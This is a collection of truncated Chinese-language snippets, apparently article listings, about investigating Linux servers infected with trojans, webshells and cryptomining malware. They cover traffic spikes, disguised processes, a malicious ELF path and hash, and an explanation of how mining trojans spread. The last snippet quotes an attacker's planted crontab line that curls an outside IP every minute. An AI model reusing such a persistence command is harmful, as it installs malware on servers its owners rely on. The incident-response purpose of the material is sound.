開篇前言 Linux服務器一直給我們的印象是安全、穩定、可靠，性能卓越。由於一來Linux本身的安全機制，Linux上的病毒、木馬較少，二則由於宣稱Linux是最安全的操作系統，導致很多人對Linux的安全性有個誤解：以為它永遠不會感染病毒、木馬；以為它沒有安全漏洞。所以很多Linux ...

1、查看流量圖發現問題 查看的時候網頁非常卡，有的時候甚至沒有響應 2、top動態查看進程 我馬上遠程登錄出問題的服務器，遠程操作很卡，網卡出去的流量非常大，通過top發現了一個異常的進程占用資源比較高，名字不仔細看還真以為是一個Web服務進程。 4、結束異常進程並繼續追蹤 ...

一、說明 如果出現文件上傳漏洞和命令執行類漏洞（包括命令注入、緩沖區溢出、反序列化等）都會讓人擔心，系統是否系統已被上傳webshell甚至植入木馬程序。如果依靠人工排查，一是工作量大二是需要一定程度的技術知識和業務知識才能判斷什么是正常什么是異常。工作量大決定排查工作不可能由個別具有技術知識 ...

/threads/413337/ 首先是下午14點左右有幾台服務器出現流量超高，平時只有幾百M的流 ...

如果是雲服務器可以在‘雲監控-態勢與感知’中直接看到木馬文件相關進程name，id以及路徑如下：文件路徑: /opt/apache-tomcat-7.0.104/bin/shell1.elf惡意文件md5: 91cc7f105856a0e9eb6a29ef3d08d9ce進程id: 27504 ...

一、什么是挖礦木馬 挖礦木馬會占用CPU進行超頻運算，從而占用主機大量的CPU資源，嚴重影響服務器上的其他應用的正常運行。黑客為了得到更多的算力資源，一般都會對全網進行無差別掃描，同時利用SSH爆破和漏洞利用等手段攻擊主機。部分挖礦木馬還具備蠕蟲化的特點，在主機被成功入侵之后，挖礦木馬還會向內 ...

什么是挖礦木馬 挖礦木馬會占用CPU進行超頻運算，從而占用主機大量的CPU資源，嚴重影響服務器上的其他應用的正常運行。黑客為了得到更多的算力資源，一般都會對全網進行無差別掃描，同時利用SSH爆破和漏洞利用等手段攻擊主機。部分挖礦木馬還具備蠕蟲化的特點，在主機被成功入侵之后，挖礦木馬還會向內網滲透 ...

最近emr集群跑任務的時候總出現 task failed ，優化sql，調提交任務參數都沒解決，最后再我排查時候，發現一個從節點的cpu使用800% 經過一些列排查，發現是被注入木馬了， #被人種下的crontab#* * * * * curl -s http://158.69.133.17 ...